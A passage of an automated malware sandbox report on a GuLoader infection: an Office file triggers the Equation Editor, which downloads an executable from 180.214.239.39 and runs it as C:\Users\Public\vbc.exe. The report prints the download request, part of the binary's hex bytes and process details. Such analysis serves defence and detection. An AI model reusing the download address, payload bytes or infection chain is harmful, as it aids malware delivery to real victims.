      Jul 22, 2021 14:03:06.118415117 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.118467093 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.118565083 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.364136934 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.364173889 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.364198923 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.364218950 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.364243984 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.364269018 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.364294052 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.364320040 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.364352942 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.364382029 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.364382982 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.364408970 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.364423990 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.364437103 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.364459038 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.364464998 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.364491940 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.364492893 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.364520073 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.364527941 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.364547014 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.364573002 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.364603043 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.368751049 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.611433029 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.611480951 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.611515045 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.611545086 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.611568928 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.611598969 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.611629963 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.611655951 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.611685991 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.611721992 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.611721039 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.611748934 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.611752987 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.611752987 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.611754894 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.611757994 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.611787081 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.611793041 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.611815929 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.611821890 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.611855984 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.611860037 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.611871958 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.611886024 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.611916065 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.611917019 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.611928940 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.611947060 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.611958981 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.611975908 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.611991882 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.612006903 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.612018108 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.612037897 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.612046957 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.612072945 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.612097025 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.612107038 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.612126112 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.612138033 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.612153053 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.612168074 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.612180948 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.612196922 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.612226009 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.612242937 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.612246037 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.612253904 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.612268925 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.612284899 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.612298965 CEST  49167        80         192.168.2.22     180.214.239.39
      Jul 22, 2021 14:03:06.612318039 CEST  80           49167      180.214.239.39   192.168.2.22
      Jul 22, 2021 14:03:06.612344980 CEST  49167        80         192.168.2.22     180.214.239.39

      HTTP Request Dependency Graph

      • 180.214.239.39

      HTTP Packets

      Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
      0           192.168.2.22  49167        180.214.239.39  80                C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      Timestamp                             kBytes transferred  Direction  Data
      Jul 22, 2021 14:03:05.622628927 CEST  0                   OUT        GET /process/.svchost.exe HTTP/1.1
      Accept: */*
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
      Host: 180.214.239.39
      Connection: Keep-Alive
      Jul 22, 2021 14:03:05.870244980 CEST  1                   IN         HTTP/1.1 200 OK
      Date: Thu, 22 Jul 2021 11:50:59 GMT
      Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
      Last-Modified: Wed, 21 Jul 2021 22:37:17 GMT
      ETag: "3c468-5c7a9d0090119"
      Accept-Ranges: bytes
      Content-Length: 246888
      Keep-Alive: timeout=5, max=100
      Connection: Keep-Alive
      Content-Type: application/x-msdownload
      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 bf 79 da 83 de 17 89 83 de 17 89 83 de 17 89 00 c2 19 89 82 de 17 89 cc fc 1e 89 87 de 17 89 b5 f8 1a 89 82 de 17 89 52 69 63 68 83 de 17 89 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 82 b6 5c 53 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 30 03 00 00 70 00 00 00 00 00 00 30 13 00 00 00 10 00 00 00 40 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 07 00 00 00 04 00 00 00 00 00 00 00 00 b0 03 00 00 10 00 00 19 f9 03 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 74 30 03 00 28 00 00 00 00 50 03 00 c4 54 00 00 00 00 00 00 00 00 00 00 58 b0 03 00 10 14 00 00 00 00 00 00 00 00 00 00 00 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 24 03 00 00 10 00 00 00 30 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 90 0b 00 00 00 40 03 00 00 10 00 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c4 54 00 00 00 50 03 00 00 60 00 00 00 50 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$yRichPEL\S0p0@@t0(PTX( .text$0 `.data@@@.rsrcTP`P@@IMSVBVM60.DLL


      Code Manipulations

      Statistics

      Behavior


      System Behavior

      General

      Start time:14:02:56
      Start date:22/07/2021
      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      Wow64 process (32bit):false
      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Imagebase:0x13fcf0000
      File size:27641504 bytes
      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:14:03:17
      Start date:22/07/2021
      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      Wow64 process (32bit):true
      Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Imagebase:0x400000
      File size:543304 bytes
      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Start time:14:03:20
      Start date:22/07/2021
      Path:C:\Users\Public\vbc.exe
      Wow64 process (32bit):true
      Commandline:'C:\Users\Public\vbc.exe'
      Imagebase:0x400000
      File size:246888 bytes
      MD5 hash:C937FC9ED4325E6AB24D49A3175F3A5C
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:Visual Basic
      Yara matches:
      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000006.00000002.2388759813.00000000002E0000.00000040.00000001.sdmp, Author: Joe Security
      Antivirus matches:
      • Detection: 43%, ReversingLabs
      Reputation:low

      Disassembly

      Code Analysis
